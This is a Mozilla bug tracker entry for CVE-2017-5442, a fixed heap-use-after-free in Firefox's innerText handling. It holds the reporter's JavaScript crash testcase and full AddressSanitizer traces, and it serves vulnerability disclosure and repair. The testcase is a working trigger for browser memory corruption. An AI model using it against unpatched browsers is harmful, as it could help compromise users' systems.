Bug 1347979 (CVE-2017-5442)

heap-use-after-free in GetRequiredInnerTextLineBreakCount

RESOLVED FIXED in Firefox -esr45

Status

Severity: critical
Status: RESOLVED FIXED
Reported: 2 years ago
Modified: a year ago

People

(Reporter: nils, Assigned: mats)

Tracking

Version: Trunk
Target Milestone: mozilla55
Keywords: crash, csectype-uaf, sec-high, testcase
Points:
---
Bug Flags:
sec-bounty +
in-testsuite ?
qe-verify -

Firefox Tracking Flags

(firefox-esr4553+ fixed, firefox52 wontfix, firefox-esr5253+ fixed, firefox53+ fixed, firefox54+ fixed, firefox55+ fixed)

Details

(Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+])

Attachments

(2 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170316115330)

<script>
function start() {
	o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o0.src="data:text/html,<div><div><div>";
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o0);
	o2=window.document.documentElement;
}
function fun0() {
	o4=o0.contentDocument;
	tmp=o4.getElementsByTagName('*');
	o5=tmp[0];
	o7=tmp[4];
	o0.contentWindow.onresize=fun1;
	o0.width='-4px';
	o7.innerHTML='<rp><style>*{ display: ruby-text-container;</style> a';
	o5.innerText;
}
function fun1() {
	o2.textContent='undefined';
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==7691==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250003cb680 at pc 0x7f3175181423 bp 0x7ffeb6ea8e30 sp 0x7ffeb6ea8e28
READ of size 8 at 0x6250003cb680 thread T0 (Web Content)
    #0 0x7f3175181422 in GetContent /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43
    #1 0x7f3175181422 in GetRequiredInnerTextLineBreakCount /home/worker/workspace/build/src/dom/base/nsRange.cpp:3487
    #2 0x7f3175181422 in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&, mozilla::ErrorResult&, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3588
    #3 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #4 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #5 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #6 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #7 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #8 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #9 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #10 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #11 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #12 0x7f317cedc605 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #13 0x7f317cedc605 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #14 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #15 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #16 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #17 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #18 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #19 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #20 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #21 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #22 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #23 0x7f317c048281 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #24 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #25 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #26 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #27 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #28 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #29 0x7f3176ca5c88 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #30 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #31 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #32 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #33 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #34 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #35 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #36 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
    #37 0x7f3176c9375c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #38 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #39 0x7f3178dc91ec in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #40 0x7f317b1502d9 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #41 0x7f317b14c538 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #42 0x7f317b15368f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #43 0x7f3174063729 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #44 0x7f31740626dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #45 0x7f317405f578 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #46 0x7f31740613f2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #47 0x7f317406211c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #48 0x7f3172832352 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:28
    #49 0x7f3175038b6b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8858:18
    #50 0x7f317503873c in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8784:9
    #51 0x7f317500f6ed in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5289:3
    #52 0x7f31750d8ce2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #53 0x7f31750d8ce2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #54 0x7f31750d8ce2 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #55 0x7f317264ba61 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #56 0x7f317267f34c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #57 0x7f317267bc78 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #58 0x7f3173423de1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #59 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #60 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #61 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #62 0x7f31785e89af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #63 0x7f317bc11f07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:22
    #64 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #65 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #66 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #67 0x7f317bc11926 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:34
    #68 0x4eb4b3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #69 0x4eb4b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #70 0x7f318da7b82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #71 0x41ce08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ce08)

0x6250003cb680 is located 5504 bytes inside of 8192-byte region [0x6250003ca100,0x6250003cc100)
freed by thread T0 (Web Content) here:
    #0 0x4bb33b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f318ad52347 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7f318ad52347 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7f3178c5f00c in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7f3178cd689b in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:182:7
    #5 0x7f3178cd6a3d in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:899:1
    #6 0x7f3178cd2314 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:893:1
    #7 0x7f3178adb884 in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #8 0x7f3178adb884 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:451
    #9 0x7f317517fe0f in ElementIsVisible /home/worker/workspace/build/src/dom/base/nsRange.cpp:3454:31
    #10 0x7f317517fe0f in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&, mozilla::ErrorResult&, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3583
    #11 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #12 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #13 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #14 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #16 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #17 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #18 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #19 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #20 0x7f317cedc605 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #21 0x7f317cedc605 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #22 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #23 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #24 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #25 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #26 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #27 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #28 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #29 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #30 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #31 0x7f317c048281 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #32 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #33 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #34 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #35 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #37 0x7f3176ca5c88 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #38 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #39 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #40 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #41 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #42 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #43 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #44 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb68c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f318ad51c54 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7f3178c5f84b in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:240
    #5 0x7f3178bda31f in operator new /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1400
    #6 0x7f3178bda31f in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1429
    #7 0x7f3178be9ee4 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:946:14
    #8 0x7f3178beeb01 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1400:10
    #9 0x7f3178bee5a0 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1410:10
    #10 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:136:12
    #11 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:94
    #12 0x7f3178d83598 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*, mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5066
    #13 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5031:10
    #14 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5047
    #15 0x7f3178d868b2 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5685
    #16 0x7f3178d69fd1 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11046:9
    #17 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #18 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #19 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #20 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #21 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #22 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #23 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #24 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #25 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #26 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #27 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #28 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #29 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #30 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #31 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #32 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #33 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #34 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #35 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
